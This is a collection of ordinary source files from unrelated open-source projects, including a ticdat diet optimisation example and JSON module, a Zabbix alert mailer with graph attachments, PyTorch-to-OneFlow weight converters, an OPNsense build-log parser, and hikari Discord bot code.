# There are three solution tables, with 3 primary key fields and 3 data fields.
solution_schema = TicDatFactory(
parameters=[["Parameter"], ["Value"]],
buy_food=[["Food"], ["Quantity"]],
consume_nutrition=[["Category"], ["Quantity"]])
# ---------------------------------------------------------------------------------
# ------------------------ create a solve function --------------------------------
def solve(dat):
"""
core solving routine
:param dat: a good ticdat for the input_schema
:return: a good ticdat for the solution_schema, or None
"""
assert input_schema.good_tic_dat_object(dat)
assert not input_schema.find_foreign_key_failures(dat)
assert not input_schema.find_data_type_failures(dat)
assert not input_schema.find_data_row_failures(dat)
if gp is None: # even if you don't have gurobipy installed, you can still import this file for other uses
print("*****\ngurobipy needs to be installed for this example code to solve!\n*****\n")
mdl = gp.Model("diet")
nutrition = {c: mdl.addVar(lb=n["Min Nutrition"], ub=n["Max Nutrition"], name=c)
for c, n in dat.categories.items()}
# Create decision variables for the foods to buy
buy = {f: mdl.addVar(name=f) for f in dat.foods}
# Nutrition constraints
for c in dat.categories:
mdl.addConstr(gp.quicksum(dat.nutrition_quantities[f, c]["Quantity"] * buy[f]
for f in dat.foods) == nutrition[c],
name=c)
mdl.setObjective(gp.quicksum(buy[f] * c["Cost"] for f, c in dat.foods.items()),
sense=gp.GRB.MINIMIZE)
mdl.optimize()
if mdl.status == gp.GRB.OPTIMAL:
sln = solution_schema.TicDat()
for f,x in buy.items():
if x.x > 0:
sln.buy_food[f] = x.x
for c,x in nutrition.items():
sln.consume_nutrition[c] = x.x
sln.parameters['Total Cost'] = sum(dat.foods[f]["Cost"] * r["Quantity"]
for f, r in sln.buy_food.items())
return sln
# ---------------------------------------------------------------------------------
# ------------------------ provide stand-alone functionality ----------------------
# when run from the command line, will read/write json/xls/csv/db/sql/mdb files
if __name__ == "__main__":
standard_main(input_schema, solution_schema, solve)
# ---------------------------------------------------------------------------------
```
#### File: ticdat/ticdat/jsontd.py
```python
import os
from collections import defaultdict
from ticdat.utils import freezable_factory, TicDatError, verify, stringish, dictish, containerish
from ticdat.utils import find_duplicates_from_dict_ticdat
import datetime
import itertools
try:
import json
except:
json = None
_can_unit_test = json
def _standard_verify(tdf):
verify(json, "json needs to be installed to use this subroutine")
verify(not tdf.generator_tables, "json not yet implemented for generator tables.")
verify(not tdf.generic_tables, "json not yet implemented for generic tables.\n" +
"This is due to lack of multi-index json support. See goo.gl/u6FGBg")
def make_json_dict(tdf, tic_dat, verbose=False, use_infinity_io_flag_if_provided=False):
assert tdf.good_tic_dat_object(tic_dat)
def write_cell(t, f, x):
if isinstance(x, datetime.datetime):
return str(x)
return x if not use_infinity_io_flag_if_provided else tdf._infinity_flag_write_cell(t, f, x)
jdict = defaultdict(list)
for t in tdf.all_tables:
all_fields = tdf.primary_key_fields.get(t,()) + tdf.data_fields.get(t,())
def make_row(row):
assert containerish(row) and len(row) == len(all_fields)
row = [write_cell(t, f, x) for f, x in zip(all_fields, row)]
return {f:v for f,v in zip(all_fields, row)} if verbose else row
appender = lambda row : jdict[t].append(make_row(row))
tbl = getattr(tic_dat, t)
if tdf.primary_key_fields.get(t):
for pk, data_row in tbl.items():
appender((list(pk) if containerish(pk) else [pk]) +
[data_row[df] for df in tdf.data_fields[t]])
else:
for data_row in tbl:
appender([data_row[df] for df in tdf.data_fields[t]])
return jdict
class JsonTicFactory(freezable_factory(object, "_isFrozen")) :
"""
Primary class for reading/writing json files with TicDat objects.
You need the json package to be installed to use it.
"""
def __init__(self, tic_dat_factory):
"""
Don't call this function explicitly. A JsonTicFactory will
automatically be associated with the json attribute of the parent
TicDatFactory.
:param tic_dat_factory:
:return:
"""
self.tic_dat_factory = tic_dat_factory
self._isFrozen = True
def _looks_pandas(self, jdict):
if not all(set(itertools.chain(*v)) == {'columns', 'data'} for v in self.tic_dat_factory.schema().values()):
return all(dictish(v) and set(v.keys()) == {'columns', 'data'} for v in jdict.values())
def create_tic_dat(self, json_file_path, freeze_it = False, from_pandas = False):
"""
Create a TicDat object from a json file
:param json_file_path: A json file path. It should encode a dictionary
with table names as keys. Could also be an actual JSON string
:param freeze_it: boolean. should the returned object be frozen?
:param from_pandas: boolean. If truthy, then use pandas json readers. See
PanDatFactory json readers for more details. This argument is historical, as a
json format that matches the PanDatFactory.json format will be detected automatically,
and thus client code is generally safe ignoring this argument completely.
:return: a TicDat object populated by the matching tables.
caveats: Table names matches are case insensitive and also
underscore-space insensitive.
Tables that don't find a match are interpreted as an empty table.
Dictionary keys that don't match any table are ignored.
"""
_standard_verify(self.tic_dat_factory)
if from_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
_rtn = pdf.json.create_pan_dat(json_file_path)
return pdf.copy_to_tic_dat(_rtn, freeze_it=freeze_it)
jdict = self._create_jdict(json_file_path)
if self._looks_pandas(jdict):
return self.create_tic_dat(json_file_path, freeze_it=freeze_it, from_pandas=True)
tic_dat_dict = self._create_tic_dat_dict(jdict)
missing_tables = set(self.tic_dat_factory.all_tables).difference(tic_dat_dict)
if missing_tables:
print ("The following table names could not be found in the json file/string\n%s\n"%
"\n".join(missing_tables))
rtn = self.tic_dat_factory.TicDat(**tic_dat_dict)
rtn = self.tic_dat_factory._parameter_table_post_read_adjustment(rtn)
if freeze_it:
return self.tic_dat_factory.freeze_me(rtn)
return rtn
def find_duplicates(self, json_file_path, from_pandas = False):
"""
Find the row counts for duplicated rows.
:param json_file_path: A json file path. It should encode a dictionary
with table names as keys.
:param from_pandas: boolean. If truthy, then use pandas json readers. See
PanDatFactory json readers for more details.
:return: A dictionary whose keys are table names for the primary-ed key tables.
Each value of the return dictionary is itself a dictionary.
The inner dictionary is keyed by the primary key values encountered in the table,
and the value is the count of records in the json entry with this primary key.
Row counts smaller than 2 are pruned off, as they aren't duplicates
"""
_standard_verify(self.tic_dat_factory)
if from_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
_rtn = pdf.json.create_pan_dat(json_file_path)
jdict = {t: [tuple(_) for _ in getattr(_rtn, t).itertuples(index=False)] for t in pdf.all_tables}
else:
jdict = self._create_jdict(json_file_path)
if self._looks_pandas(jdict):
return self.find_duplicates(json_file_path, from_pandas=True)
rtn = find_duplicates_from_dict_ticdat(self.tic_dat_factory, jdict)
return rtn or {}
def _create_jdict(self, path_or_buf):
if stringish(path_or_buf) and os.path.exists(path_or_buf):
reasonble_string = path_or_buf
verify(os.path.isfile(path_or_buf), "json_file_path is not a valid file path.")
try :
with open(path_or_buf, "r") as fp:
jdict = json.load(fp)
except Exception as e:
raise TicDatError("Unable to interpret %s as json file : %s" %
(path_or_buf, e))
else:
verify(stringish(path_or_buf), "%s isn't a string" % path_or_buf)
reasonble_string = path_or_buf[:10]
try:
jdict = json.loads(path_or_buf)
except Exception as e:
raise TicDatError("Unable to interpret %s as json string : %s" %
(reasonble_string, e))
verify(dictish(jdict), "%s failed to load a dictionary" % reasonble_string)
verify(all(map(stringish, jdict)),
"The dictionary loaded from %s isn't indexed by strings" % reasonble_string)
verify(all(map(containerish, jdict.values())),
"The dictionary loaded from %s doesn't have containers as values" % reasonble_string)
return jdict
def _create_tic_dat_dict(self, jdict):
tdf = self.tic_dat_factory
rtn = {}
table_keys = defaultdict(list)
for t in tdf.all_tables:
for t2 in jdict:
if stringish(t2) and t.lower() == t2.replace(" ", "_").lower():
table_keys[t].append(t2)
if len(table_keys[t]) >= 1:
verify(len(table_keys[t]) < 2, "Found duplicate matching keys for table %s"%t)
rtn[t] = jdict[table_keys[t][0]]
orig_rtn, rtn = rtn, {}
for t, rows in orig_rtn.items():
all_fields = tdf.primary_key_fields.get(t, ()) + tdf.data_fields.get(t, ())
rtn[t] = []
for row in rows:
if dictish(row):
rtn[t].append({f: tdf._general_read_cell(t, f, x) for f, x in row.items()})
else:
rtn[t].append([tdf._general_read_cell(t, f, x) for f, x in zip(all_fields, row)])
return rtn
def write_file(self, tic_dat, json_file_path, allow_overwrite=False, verbose=False, to_pandas=False):
"""
write the ticDat data to a json file (or json string)
:param tic_dat: the data object to write (typically a TicDat)
:param json_file_path: The file path of the json file to create. If empty string, then return a JSON string.
:param allow_overwrite: boolean - are we allowed to overwrite an
existing file?
:param verbose: boolean. Verbose mode writes the data rows as dicts
keyed by field name. Otherwise, they are lists.
:param to_pandas: boolean. if truthy, then use the PanDatFactory method of writing to json.
:return:
"""
_standard_verify(self.tic_dat_factory)
verify(not (to_pandas and verbose), "verbose argument is inconsistent with to_pandas")
verify(not (json_file_path and os.path.exists(json_file_path) and not allow_overwrite),
"%s exists and allow_overwrite is not enabled"%json_file_path)
if to_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
return pdf.json.write_file(self.tic_dat_factory.copy_to_pandas(tic_dat, drop_pk_columns=False),
json_file_path)
msg = []
if not self.tic_dat_factory.good_tic_dat_object(tic_dat, lambda m : msg.append(m)) :
raise TicDatError("Not a valid TicDat object for this schema : " + " : ".join(msg))
jdict = make_json_dict(self.tic_dat_factory, tic_dat, verbose, use_infinity_io_flag_if_provided=True)
if not json_file_path:
return json.dumps(jdict, sort_keys=True, indent=2)
with open(json_file_path, "w") as fp:
json.dump(jdict, fp, sort_keys=True, indent=2)
``` |
{
"source": "8140171224/Class-Object-function",
"score": 4
} |
#### File: Class-Object-function/function/odd_even.py
```python
def count(lst):
even = 0
odd = 0
for i in lst:
if i%2==0:
even+=1
else:
odd+=1
return even,odd
lst = [25,35,51,65,5745,132,4,21,32,541]
even, odd = count(lst)
print(f'Even : {even} & odd : {odd}')
``` |
{
"source": "815325223/Scripts",
"score": 2
} |
#### File: Scripts/Zabbix/mail_with_graph.py
```python
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.application import MIMEApplication
from pyzabbix import ZabbixAPI
import os
import argparse
import logging
import datetime
import requests
import tempfile
import re
import urllib3
class Zabbix_Graph(object):
""" Zabbix_Graph """
def __init__(self, url=None, user=None, pwd=None, timeout=None):
urllib3.disable_warnings()
if timeout == None:
self.timeout = 1
else:
self.timeout = timeout
self.url = url
self.user = user
self.pwd = <PASSWORD>
self.cookies = {}
self.zapi = None
def _do_login(self):
""" do_login """
if self.url == None or self.user == None or self.pwd == None:
print "url or user or u_pwd can not None"
return None
if self.zapi is not None:
return self.zapi
try:
zapi = ZabbixAPI(self.url)
zapi.session.verify = False
zapi.login(self.user, self.pwd)
self.cookies["zbx_sessionid"] = str(zapi.auth)
self.zapi = zapi
return zapi
except Exception as e:
print "auth failed:\t%s " % (e)
return None
def _is_can_graph(self, itemid=None):
self.zapi = self._do_login()
if self.zapi is None:
print "zabbix login fail, self.zapi is None:"
return False
if itemid is not None:
"""
0 - numeric float;
1 - character;
2 - log;
3 - numeric unsigned;
4 - text.
"""
item_info = self.zapi.item.get(
filter={"itemid": itemid}, output=["value_type"])
if len(item_info) > 0:
if item_info[0]["value_type"] in [u'0', u'3']:
return True
else:
print "get itemid fail"
return False
def get_graph(self, itemid=None):
""" get_graph """
if itemid == None:
print "itemid can not None"
return "ERROR"
if self._is_can_graph(itemid=itemid) is False or self.zapi is None:
print "itemid can't graph"
return "ERROR"
if len(re.findall('5.0', self.zapi.api_version())) == 1:
graph_url = "%s/chart.php?from=now-1h&to=now&itemids[]=%s" % (
zbx_url, itemid)
else:
graph_url = "%s/chart.php?period=3600&itemids[]=%s" % (
zbx_url, itemid)
try:
rq = requests.get(graph_url, cookies=self.cookies,
timeout=self.timeout, stream=True, verify=False)
if rq.status_code == 200:
imgpath = tempfile.mktemp()
with open(imgpath, 'wb') as f:
for chunk in rq.iter_content(1024):
f.write(chunk)
return imgpath
rq.close()
except:
return "ERROR"
class Mail(object):
""" send mail"""
def __init__(self, server=None, port=None, user=None, pwd=<PASSWORD>):
self.server = server
self.port = port
self.user = user
self.pwd = <PASSWORD>
self.logpath = '/tmp/.zabbix_alert'
def _connect(self):
""" Connect to SMTP server """
if self.server == None or self.port == None or self.user == None or self.pwd == None:
print "Error smtp_server=None, smtp_port=None, smtp_user=None, smtp_u_pwd=None"
return False
try:
if self.port == 465:
smtp = smtplib.SMTP_SSL()
smtp.connect(self.server, self.port)
elif self.port == 587:
smtp = smtplib.SMTP()
smtp.connect(self.server, self.port)
smtp.ehlo()
smtp.starttls()
smtp.ehlo
else:
smtp = smtplib.SMTP()
smtp.connect(self.server, self.port)
smtp.login(self.user, self.pwd)
return smtp
except Exception as e:
print "Connect to smtp server error:\t%s" % (e)
return False
return True
def Send(self, receiver, subject, content, img=None):
""" Send mail to user """
smtp_connect = self._connect()
if smtp_connect == None or smtp_connect == False:
return
if img == None:
"""send with graph"""
msg = MIMEText(content, _subtype='plain', _charset='utf-8')
msg['Subject'] = unicode(subject, 'UTF-8')
msg['From'] = self.user
msg['to'] = receiver
try:
smtp_connect.sendmail(
self.user, receiver, msg.as_string())
except Exception as e:
print "send mail error:\t%s" % (e)
else:
"""send with graph"""
msg = MIMEMultipart('related')
msg['Subject'] = unicode(subject, 'UTF-8')
msg['From'] = self.user
msg['to'] = receiver
content = content.replace("\n", "<br/>")
content_html = """\
<p>%s<br/>
<img src="cid:monitor_graph">
</p>""" % (content)
msg_html = MIMEText(
content_html, _subtype='html', _charset='utf-8')
with open(img, 'rb') as f_img:
read_img = f_img.read()
msg_img = MIMEImage(read_img, 'png')
msg_img.add_header('Content-ID', '<monitor_graph>')
msg_img.add_header('Content-Disposition', 'inline', filename=img)
msg.attach(msg_html)
msg.attach(msg_img)
try:
smtp_connect.sendmail(self.user, receiver, msg.as_string())
except Exception as e:
print "send mail error:\t%s" % (e)
finally:
os.remove(img)
smtp_connect.close()
self.log(receiver, subject, content)
print 'send ok'
def log(self, receiver, subject, content):
""" log """
if not os.path.isdir(self.logpath):
os.makedirs(self.logpath)
# write log
try:
current_time = datetime.datetime.now()
current_day = current_time.strftime('%Y-%m-%d')
current_day_log = self.logpath + '/' + str(current_day) + '.log'
logging.basicConfig(filename=current_day_log, level=logging.DEBUG)
logging.info('*' * 130)
logging.debug(str(
current_time) + '\nsend mail to user:\t{0}\nsubject:\t\n{1}\ncontent:\t\n{2}'.format(receiver, subject, content))
if os.getuid() == 0:
os.system('chown zabbix.zabbix {0}'.format(current_day_log))
except:
pass
# remore log 7 days ago
try:
days_ago_time = current_time - datetime.timedelta(days=7)
days_ago_day = days_ago_time.strftime('%Y-%m-%d')
days_ago_log = self.logpath + '/' + str(days_ago_day) + '.log'
if os.path.exists(days_ago_log):
os.remove(days_ago_log)
except:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='send mail to user for zabbix alerting')
parser.add_argument('receiver', action="store",
help='user of the mail to send')
parser.add_argument('subject', action="store",
help='subject of the mail')
parser.add_argument('content', action="store",
help='content of the mail')
parser.add_argument('withgraph', action="store", nargs='?',
default='None', help='The Zabbix Graph for mail')
args = parser.parse_args()
receiver = args.receiver
subject = args.subject
content = args.content
withgraph = args.withgraph
img = "ERROR"
itemid = "0"
#-----------------------------------------------------------------------------------#
# Mail Server (mail.qq.com), you should set it with you mail server information
smtp_server = 'smtp.qq.com'
smtp_port = 587
smtp_user = '<EMAIL>'
smtp_pwd = '{PASSWORD}'
# Zabbix API, you should set it
zbx_url = 'http://127.0.0.1/zabbix'
#zbx_url = 'http://127.0.0.1'
zbx_user = '{USER}'
zbx_pwd = '{PASSWORD}'
#-----------------------------------------------------------------------------------#
#get itemid from action
split_itemid = re.split("ItemID:\s\d", content)
pattern = re.compile(r'ItemID:.*')
str_itemid = pattern.findall(content)
if len(str_itemid) > 0:
itemid = str_itemid[0].replace(" ", "").replace("ItemID:", "")
#get graph from zabbix web
if withgraph != "None" and itemid != "0":
down_graph = Zabbix_Graph(
url=zbx_url, user=zbx_user, pwd=zbx_pwd, timeout=3)
if down_graph is not None:
img = down_graph.get_graph(itemid=itemid)
#send mail
mail_server = Mail(server=smtp_server, port=smtp_port,
user=smtp_user, pwd=smtp_pwd)
if img == "ERROR":
mail_server.Send(receiver, subject, content)
else:
mail_server.Send(receiver, subject, content, img=img)
#Action add this ItemID: {ITEM.ID}
``` |
{
"source": "8188zq/models",
"score": 3
} |
#### File: roberta/weights_transform/base_weight_utils.py
```python
import sys
import oneflow as flow
import torch
sys.path.append("../")
from models.dev_ops import LayerNorm
def colored_string(string: str, color: str or int, end="\n") -> str:
"""output string in different color in cmd [This code is copied from fitlog]
:param string: string to print
:param color: color
:return:
"""
if isinstance(color, str):
color = {
"black": 30,
"red": 31,
"green": 32,
"yellow": 33,
"blue": 34,
"purple": 35,
"cyan": 36,
"white": 37
}[color]
print("\033[%dm%s\033[0m" % (color, string), end=end)
DEPTH = 0
def indent_msg(msg, end=""):
for i in range(DEPTH):
if i == DEPTH - 1:
print(" |-", end="")
else:
print(" | ", end="")
colored_string(msg, color="yellow", end=end)
def enter():
global DEPTH
DEPTH += 1
def quit():
global DEPTH
DEPTH -= 1
def Parameter_trans(param_flow, param_torch):
assert isinstance(param_flow, flow.nn.Parameter)
assert isinstance(param_torch, torch.nn.Parameter)
data_flow = param_flow.data
data_torch = param_torch.data
assert data_flow.dim() == data_torch.dim(
), "dimension not equal: flow {} vs torch {}.".format(data_flow.shape, data_torch.shape)
for d_flow, d_torch in zip(data_flow.shape, data_torch.shape):
assert d_flow == d_torch, "shapes not equal: flow {} vs torch {}.".format(
data_flow.shape, data_torch.shape)
if param_torch.device == "cpu":
data = data_torch.detach().numpy()
else:
data = data_torch.cpu().detach().numpy()
param_flow = flow.nn.Parameter(flow.tensor(data))
return param_flow
def Embedding_trans(model_flow, model_torch):
print(" Embedding")
assert isinstance(model_flow, flow.nn.Embedding)
assert isinstance(model_torch, torch.nn.Embedding)
assert model_flow.num_embeddings == model_torch.num_embeddings, "num_embeddings not equal: flow {} vs torch {}.".format(
model_flow.num_embeddings, model_torch.num_embeddings)
assert model_flow.embedding_dim == model_torch.embedding_dim, "embedding_dim not equal: flow {} vs torch {}.".format(
model_flow.embedding_dim, model_torch.embedding_dim)
model_flow.padding_idx = model_torch.padding_idx
model_flow.max_norm = model_torch.max_norm
model_flow.norm_type = model_torch.norm_type
model_flow.scale_grad_by_freq = model_torch.scale_grad_by_freq
model_flow.sparse = model_torch.sparse
model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
return model_flow
def Linear_trans(model_flow, model_torch):
print(" Linear")
assert isinstance(model_flow, flow.nn.Linear)
assert isinstance(model_torch, torch.nn.Linear)
assert model_flow.in_features == model_torch.in_features, "in_features not equal: flow {} vs torch {}.".format(
model_flow.in_features, model_torch.in_features)
assert model_flow.out_features == model_torch.out_features, "out_features not equal: flow {} vs torch {}.".format(
model_flow.out_features, model_torch.out_features)
model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
model_flow.bias = Parameter_trans(model_flow.bias, model_torch.bias)
return model_flow
def LayerNorm_trans(model_flow, model_torch):
print(" LayerNorm")
assert isinstance(model_flow, LayerNorm)
# assert isinstance(model_flow, flow.nn.LayerNorm)
assert isinstance(model_torch, torch.nn.LayerNorm)
model_flow.a_2 = Parameter_trans(model_flow.a_2, model_torch.weight)
model_flow.b_2 = Parameter_trans(model_flow.b_2, model_torch.bias)
model_flow.eps = model_torch.eps
# model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
# model_flow.bias = Parameter_trans(model_flow.bias, model_torch.bias)
# model_flow.epsilon = model_torch.eps
# model_flow.elementwise_affine = model_torch.elementwise_affine
return model_flow
def Dropout_trans(model_flow, model_torch):
print(" Dropout")
assert isinstance(model_flow, flow.nn.Dropout)
assert isinstance(model_torch, torch.nn.Dropout)
# 似乎不需要?
model_flow.p = model_torch.p
return model_flow
``` |
{
"source": "8191/opnsense-tools",
"score": 3
} |
#### File: opnsense-tools/scripts/parse_ports_log.py
```python
import collections
import argparse
from datetime import datetime
def log_reader(filename):
with open(filename ,'rb') as f_in:
for line in f_in:
line = line.decode()
if len(line) >= 22 and line[0] == '[' and line[15] == ']' and line[1:15].isdigit() \
and line[17:21] == '===>' and line.find(' for ') > -1:
if line.strip().endswith('for building'):
continue
log_rec = collections.namedtuple('record', ['stage', 'package', 'timestamp', 'ts_epoch'])
log_rec.stage = line[22:].split()[0]
log_rec.package = line.split(' for ')[-1].split()[0]
log_rec.timestamp = datetime(*map(lambda x: int(x), (
line[1:5], line[5:7], line[7:9], line[9:11], line[11:13], line[13:15]
)))
log_rec.ts_epoch = float(log_rec.timestamp.strftime("%s"))
yield log_rec
parser = argparse.ArgumentParser()
parser.add_argument('filename', help='ports build log filename')
parser.add_argument('--steps', help='show build steps', action="store_true", default=False)
args = parser.parse_args()
stats = dict()
prev_rec = collections.namedtuple('record', ['stage', 'package', 'timestamp', 'ts_epoch'])
for record in log_reader(args.filename):
if (prev_rec.stage != record.stage or prev_rec.package != record.package) and type(prev_rec.ts_epoch) == float:
if prev_rec.package not in stats:
stats[prev_rec.package] = dict()
stats[prev_rec.package]['__total__'] = 0.0
if prev_rec.stage not in stats[prev_rec.package]:
stats[prev_rec.package][prev_rec.stage] = {'count': 0, 'total_time': 0.0}
stats[prev_rec.package][prev_rec.stage]['total_time'] += (record.ts_epoch - prev_rec.ts_epoch)
stats[prev_rec.package][prev_rec.stage]['count'] += 1
stats[prev_rec.package]['__total__'] += (record.ts_epoch - prev_rec.ts_epoch)
prev_rec = record
total_time = 0.0
for item in sorted(stats.items(), key=lambda x: x[1]['__total__']):
package = item[0]
for stage in sorted(item[1]):
if type(stats[package][stage]) == dict and args.steps:
print ("%-40s %-5.0f seconds [execs : %d]" % (
"%s[%s]" % (package, stage),
stats[package][stage]['total_time'],
stats[package][stage]['count']
))
print ("%-40s %-5.0f seconds" % (package, stats[package]['__total__']))
total_time += stats[package]['__total__']
print ("%-40s %-5.0f seconds" % ("*", total_time))
``` |
{
"source": "81CuongVn/hikaki",
"score": 3
} |
#### File: hikaki/examples/hello_world.py
```python
import os
import hikari
bot = hikari.GatewayBot(token=os.environ["BOT_TOKEN"])
@bot.listen()
async def on_message(event: hikari.MessageCreateEvent) -> None:
"""Listen for messages being created."""
if not event.is_human:
# Do not respond to bots or webhooks!
return
if event.content == "!ping":
await event.message.respond(f"Pong! {bot.heartbeat_latency * 1_000:.0f}ms")
bot.run()
```
#### File: hikaki/examples/simple_dashboard.py
```python
import logging
import os
import rillrate
from rillrate import prime as rr_prime
import hikari
PREFIX = ","
# Name used to group dashboards.
# You could have multiple packages for different applications, such as a package for the bot
# dashboards, and another package for a web server running alongside the bot.
PACKAGE = "Rillrate Example"
# Dashboards are a part inside of package, they can be used to group different types of
# dashboards that you may want to use, like a dashboard for system status, another dashboard
# for cache status, and another one to configure features or trigger actions on the bot.
DASHBOARD = "Control Panel"
# These are menus inside the dashboard, you can use them to group specific sets
# of data inside the same dashboard.
GROUP_CONFIG = "1 - Example"
# All the 3 configurable namespaces are sorted alphabetically.
# Class with all our dashboard logic
class RillRateDashboard:
"""Global data shared across the entire bot, used to store dashboard values."""
__slots__ = ("logger", "value", "selector", "slider")
def __init__(self) -> None:
self.logger = logging.getLogger("dashboard")
self.value = 0
# Install rillrate - Spins up the rillrate service in a separate thread, making it non-blocking :)
rillrate.install()
# Register the dashboard objects
dummy_values = [str(i) for i in range(0, 256 + 1, 32)]
self.selector = rr_prime.Selector(
f"{PACKAGE}.{DASHBOARD}.{GROUP_CONFIG}.Selector", label="Choose!", options=dummy_values
)
self.slider = rr_prime.Slider(
f"{PACKAGE}.{DASHBOARD}.{GROUP_CONFIG}.Slider", label="More fine grain control", min=0, max=256, step=2
)
# Add sync callbacks - This way we tell rillrate what functions to call when a sync event occurs
self.selector.sync_callback(self._selector_callback)
self.slider.sync_callback(self._slider_callback)
def _selector_callback(self, activity: rillrate.Activity, action: rillrate.Action) -> None:
self.logger.info("Selector activity: %s | action = %s", activity, action)
if action is not None:
value = int(action.value)
self.logger.info("Selected: %s", value)
# Update the slider too, so they show the same value.
self.slider.apply(value)
# Overwrite the current stored value on the global data with the new selected value.
self.value = value
def _slider_callback(self, activity: rillrate.Activity, action: rillrate.Action) -> None:
self.logger.info("Slider activity: %s | action = %s", activity, action)
if action is not None:
value = int(action.value)
self.logger.info("Slided to: %s", value)
# Update the selector too, so they show the same value.
# It is important to note that since not all values are present in the selector, it might be empty sometimes
self.selector.apply(str(value))
# Overwrite the current stored value on the global data with the new selected value.
self.value = value
bot = hikari.GatewayBot(token=os.environ["BOT_TOKEN"])
dashboard = RillRateDashboard()
def is_command(cmd_name: str, content: str) -> bool:
"""Check if the message sent is a valid command."""
return content == f"{PREFIX}{cmd_name}"
@bot.listen()
async def message(event: hikari.GuildMessageCreateEvent) -> None:
"""Listen for messages being created."""
if not event.is_human or not event.content:
return
# Command Framework 101 :D
if event.content.startswith(PREFIX):
if is_command("ping", event.content):
await event.message.respond("Pong!")
elif is_command("value", event.content):
await event.message.respond(f"Current value: {dashboard.value}")
bot.run()
```
#### File: hikari/events/base_events.py
```python
from __future__ import annotations
__all__: typing.List[str] = [
"Event",
"ExceptionEvent",
"is_no_recursive_throw_event",
"no_recursive_throw",
"get_required_intents_for",
"requires_intents",
]
import abc
import inspect
import typing
import attr
from hikari import intents
from hikari import traits
from hikari.api import shard as gateway_shard
from hikari.internal import attr_extensions
if typing.TYPE_CHECKING:
import types
T = typing.TypeVar("T")
REQUIRED_INTENTS_ATTR: typing.Final[str] = "___requiresintents___"
NO_RECURSIVE_THROW_ATTR: typing.Final[str] = "___norecursivethrow___"
class Event(abc.ABC):
"""Base event type that all Hikari events should subclass."""
__slots__: typing.Sequence[str] = ()
@property
@abc.abstractmethod
def app(self) -> traits.RESTAware:
"""App instance for this application.
Returns
-------
hikari.traits.RESTAware
The REST-aware app trait.
"""
def get_required_intents_for(event_type: typing.Type[Event]) -> typing.Collection[intents.Intents]:
"""Retrieve the intents that are required to listen to an event type.
Parameters
----------
event_type : typing.Type[Event]
The event type to get required intents for.
Returns
-------
typing.Collection[hikari.intents.Intents]
Collection of acceptable subset combinations of intent needed to
be able to receive the given event type.
"""
result = getattr(event_type, REQUIRED_INTENTS_ATTR, ())
assert isinstance(result, typing.Collection)
return result
def requires_intents(first: intents.Intents, *rest: intents.Intents) -> typing.Callable[[T], T]:
"""Decorate an event type to define what intents it requires.
Parameters
----------
first : hikari.intents.Intents
First combination of intents that are acceptable in order to receive
the decorated event type.
*rest : hikari.intents.Intents
Zero or more additional combinations of intents to require for this
event to be subscribed to.
"""
def decorator(cls: T) -> T:
required_intents = [first, *rest]
setattr(cls, REQUIRED_INTENTS_ATTR, required_intents)
doc = inspect.getdoc(cls) or ""
doc += "\n\nThis requires one of the following combinations of intents in order to be dispatched:\n\n"
for intent_group in required_intents:
preview = " + ".join(
f"`{type(i).__module__}.{type(i).__qualname__}.{i.name}`" for i in intent_group.split()
)
doc += f" - {preview}\n"
cls.__doc__ = doc
return cls
return decorator
def no_recursive_throw() -> typing.Callable[[typing.Type[T]], typing.Type[T]]:
"""Decorate an event type to indicate errors should not be handled.
This is useful for exception event types that you do not want to
have invoked recursively.
"""
def decorator(cls: typing.Type[T]) -> typing.Type[T]:
setattr(cls, NO_RECURSIVE_THROW_ATTR, True)
doc = inspect.getdoc(cls) or ""
doc += (
"\n"
"!!! warning\n"
" Any exceptions raised by handlers for this event will be dumped to the\n"
" application logger and silently discarded, preventing recursive loops\n"
" produced by faulty exception event handling. Thus, it is imperative\n"
" that you ensure any exceptions are explicitly caught within handlers\n"
" for this event if they may occur.\n"
)
cls.__doc__ = doc
return cls
return decorator
def is_no_recursive_throw_event(obj: typing.Union[T, typing.Type[T]]) -> bool:
"""Return True if this event is marked as `___norecursivethrow___`."""
result = getattr(obj, NO_RECURSIVE_THROW_ATTR, False)
assert isinstance(result, bool)
return result
FailedEventT = typing.TypeVar("FailedEventT", bound=Event)
FailedCallbackT = typing.Callable[[FailedEventT], typing.Coroutine[typing.Any, typing.Any, None]]
@no_recursive_throw()
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
class ExceptionEvent(Event, typing.Generic[FailedEventT]):
"""Event that is raised when another event handler raises an `Exception`.
!!! note
Only exceptions that derive from `builtins.Exception` will be caught.
Other exceptions outside this range will propagate past this callback.
This prevents event handlers interfering with critical exceptions
such as `KeyboardError` which would have potentially undesired
side-effects on the application runtime.
"""
exception: Exception = attr.field()
"""Exception that was raised.
Returns
-------
builtins.Exception
Exception that was raised in the event handler.
"""
failed_event: FailedEventT = attr.field()
"""Event instance that caused the exception.
Returns
-------
hikari.events.base_events.Event
Event that was being processed when the exception occurred.
"""
failed_callback: FailedCallbackT[FailedEventT] = attr.field()
"""Event callback that threw an exception.
Returns
-------
callback
Event callback that failed execution.
"""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.failed_event.app
@property
def shard(self) -> typing.Optional[gateway_shard.GatewayShard]:
"""Shard that received the event, if there was one associated.
Returns
-------
typing.Optional[hikari.api.shard.GatewayShard]
Shard that raised this exception.
This may be `builtins.None` if no specific shard was the cause of this
exception (e.g. when starting up or shutting down).
"""
shard = getattr(self.failed_event, "shard", None)
if isinstance(shard, gateway_shard.GatewayShard):
return shard
return None
@property
def exc_info(self) -> typing.Tuple[typing.Type[Exception], Exception, typing.Optional[types.TracebackType]]:
"""Exception triplet that follows the same format as `sys.exc_info`.
Returns
-------
builtins.tuple[typing.Type[Exception], Exception, typing.Optional[types.TracebackType]]
The `sys.exc_info`-compatible tuple of the exception type, the
exception instance, and the traceback of the exception.
"""
return type(self.exception), self.exception, self.exception.__traceback__
async def retry(self) -> None:
"""Invoke the failed event again.
If an exception is thrown this time, it will need to be manually
caught in-code, or will be discarded.
"""
